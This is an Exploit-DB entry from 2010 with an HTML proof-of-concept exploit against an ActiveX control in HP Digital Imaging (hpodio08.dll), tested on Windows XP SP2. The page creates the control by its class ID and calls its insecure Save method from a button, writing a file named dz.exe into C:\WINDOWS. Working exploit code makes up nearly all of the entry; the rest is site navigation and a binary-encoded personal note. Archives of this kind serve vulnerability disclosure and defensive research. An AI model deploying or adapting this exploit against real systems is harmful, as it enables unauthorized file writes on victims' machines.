HP Digital Imaging - 'hpodio08.dll' Insecure Method

EDB-ID:

12367

CVE:

N/A

EDB Verified:

Author:

ThE g0bL!N

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-04-24

Vulnerable App: 
# Exploit Title: HP Digital Imaging (hpodio08.dll) Insecure Method Exploit 
# Author: ThE g0bL!N
# Version: All vesion 
# Tested on: Windows xp pack 2
# Code : <title>Exploited By : ThE g0bL!N </title> 
<BODY> 
<object id=dz classid="clsid:{697F5209-0494-11D6-A2B0-0060B0FBD872}"></object> 

<SCRIPT> 

function Do_it() 
{ 
File = "dz.exe" 
dz.Save(File) 
} 

</SCRIPT> 
<h3>HP Digital Imaging (hpodio08.dll) Insecure Method Exploit </h3> 
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br> 
</body> 
</HTML>
## Note: Dz.exe Will be created In C:\WINDOWS\ :) 
## 01110010 01100001 01111010 01101001 01101011 01100001 00100000 I try To hate You but i can't
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services